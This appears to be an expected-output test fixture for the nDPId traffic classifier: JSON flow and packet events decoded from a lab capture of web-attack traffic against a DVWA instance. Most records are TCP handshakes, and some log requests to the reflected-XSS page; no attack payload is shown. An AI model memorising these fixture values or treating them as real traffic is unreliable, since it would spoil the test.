-00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1499346957284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346957284,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0F6xAAD4GriysEAABwKgKMsv8AFD6Ecppc0a7\/oAQAOWsxgAAAQEICgE43cMD4q86"} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1499346957284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346957284,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iO1AAD4GPOusEAABwKgKMsv+AFCTelUw\/hdQyoAQAOVo+AAAAQEICgE43cMD4q86"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346976603,"flow_last_seen":1499346976603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346976603,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1499346976603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976603,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Un9AAD4Gc1GsEAABwKgKMsxKAFAevqLeAAAAAKACchDe8gAAAgQFtAQCCAoBOPChAAAAAAEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1499346976603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976603,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzEoKnmxhHr6i36AScSCi1wAAAgQFtAQCCAoD4sIYATjwoQEDAwc="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1499346976604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346976604,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UoBAAD4Gc1isEAABwKgKMsxKAFAevqLfCp5sYoAQAOVB3wAAAQEICgE48KED4sIY"} -00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976603,"flow_last_seen":1499346976604,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346976604,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346976677,"flow_last_seen":1499346976677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346976677,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1499346976677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976677,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8I8VAAD4GogusEAABwKgKMsxMAFCAL9N2AAAAAKACchBM1QAAAgQFtAQCCAoBOPCzAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1499346976677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976677,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzEzfj2P1gC\/Td6AScSBEIgAAAgQFtAQCCAoD4sIqATjwswEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1499346976677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346976677,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0I8ZAAD4GohKsEAABwKgKMsxMAFCAL9N3349j9oAQAOXjKAAAAQEICgE48LQD4sIq"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346976999,"flow_last_seen":1499346976999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346976999,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1499346976999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976999,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Z5FAAD4GXj+sEAABwKgKMsxeAFDFSpaVAAAAAKACchBEOAAAAgQFtAQCCAoBOPEEAAAAAAEDAwc="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346976999,"flow_last_seen":1499346976999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346976999,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1499346976999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976999,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8v9RAAD4GBfysEAABwKgKMsxgAFByIk7QAAAAAKACchDfIwAAAgQFtAQCCAoBOPEEAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1499346976999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976999,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzF63DJWlxUqWlqAScSAyBwAAAgQFtAQCCAoD4sJ7ATjxBAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1499346976999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976999,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzGAmGFC+ciJO0aAScSCizgAAAgQFtAQCCAoD4sJ7ATjxBAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1499346977000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346977000,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Z5JAAD4GXkasEAABwKgKMsxeAFDFSpaWtwyVpoAQAOXRDgAAAQEICgE48QQD4sJ7"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1499346977000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346977000,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0v9VAAD4GBgOsEAABwKgKMsxgAFByIk7RJhhQv4AQAOVB1gAAAQEICgE48QQD4sJ7"} -00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976677,"flow_last_seen":1499346977863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":364,"flow_tot_l4_payload_len":364,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1499346977863,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/dvwa\/js\/dvwaPage.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976999,"flow_last_seen":1499346977870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1499346977870,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346983175,"flow_last_seen":1499346983175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346983175,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1499346983175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346983175,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ikRAAD4GO4ysEAABwKgKMsyiAFBY531IAAAAAKACchDDnAAAAgQFtAQCCAoBOPcMAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1499346983175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346983175,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzKJurEWjWOd9SaAScSBDxgAAAgQFtAQCCAoD4siDATj3DAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1499346983176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346983176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ikVAAD4GO5OsEAABwKgKMsyiAFBY531JbqxFpIAQAOXizQAAAQEICgE49wwD4siD"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346984469,"flow_last_seen":1499346984469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346984469,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1499346984469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346984469,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8puFAAD4GHu+sEAABwKgKMsywAFBLrV6uAAAAAKACchDuHwAAAgQFtAQCCAoBOPhPAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1499346984469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346984469,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzLBWnxN3S61er6AScSC3PwAAAgQFtAQCCAoD4snGATj4TwEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1499346984470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346984470,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0puJAAD4GHvasEAABwKgKMsywAFBLrV6vVp8TeIAQAOVWRgAAAQEICgE4+FAD4snG"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":206,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346985762,"flow_last_seen":1499346985762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346985762,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1499346985762,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346985762,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8k7hAAD4GMhisEAABwKgKMsy+AFBA2morAAAAAKACchDsIwAAAgQFtAQCCAoBOPmTAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1499346985762,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346985762,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzL4AEHgfQNpqLKAScSCl5gAAAgQFtAQCCAoD4ssKATj5kwEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1499346985762,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346985762,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0k7lAAD4GMh+sEAABwKgKMsy+AFBA2mosABB4IIAQAOVE7gAAAQEICgE4+ZMD4ssK"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346988319,"flow_last_seen":1499346988319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346988319,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1499346988319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346988319,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NptAAD4GjzWsEAABwKgKMszYAFB2NsqJAAAAAKACchBT0AAAAgQFtAQCCAoBOPwSAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1499346988319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346988319,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzNhVLB2odjbKiqAScSAQbwAAAgQFtAQCCAoD4s2JATj8EgEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1499346988319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346988319,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NpxAAD4GjzysEAABwKgKMszYAFB2NsqKVSwdqYAQAOWvdgAAAQEICgE4\/BID4s2J"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346989580,"flow_last_seen":1499346989580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346989580,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1499346989580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346989580,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8HPhAAD4GqNisEAABwKgKMszmAFB8FOG1AAAAAKACchA1fQAAAgQFtAQCCAoBOP1NAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1499346989580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346989580,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzOZrnFEQfBThtqAScSCnCAAAAgQFtAQCCAoD4s7EATj9TQEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1499346989581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346989581,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HPlAAD4GqN+sEAABwKgKMszmAFB8FOG2a5xREYAQAOVGDwAAAQEICgE4\/U4D4s7E"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346992144,"flow_last_seen":1499346992144,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346992144,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1499346992144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346992144,"pkt":"ABm5CmnxAMGxFOsxCABFAAA855pAAD4G3jWsEAABwKgKMs0AAFBUEBhUAAAAAKACchAkSAAAAgQFtAQCCAoBOP\/OAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1499346992144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346992144,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzQA256uwVBAYVaAScSBtZwAAAgQFtAQCCAoD4tFFATj\/zgEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1499346992145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346992145,"pkt":"ABm5CmnxAMGxFOsxCABFAAA055tAAD4G3jysEAABwKgKMs0AAFBUEBhVNuersYAQAOUMbgAAAQEICgE4\/88D4tFF"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346993434,"flow_last_seen":1499346993434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346993434,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 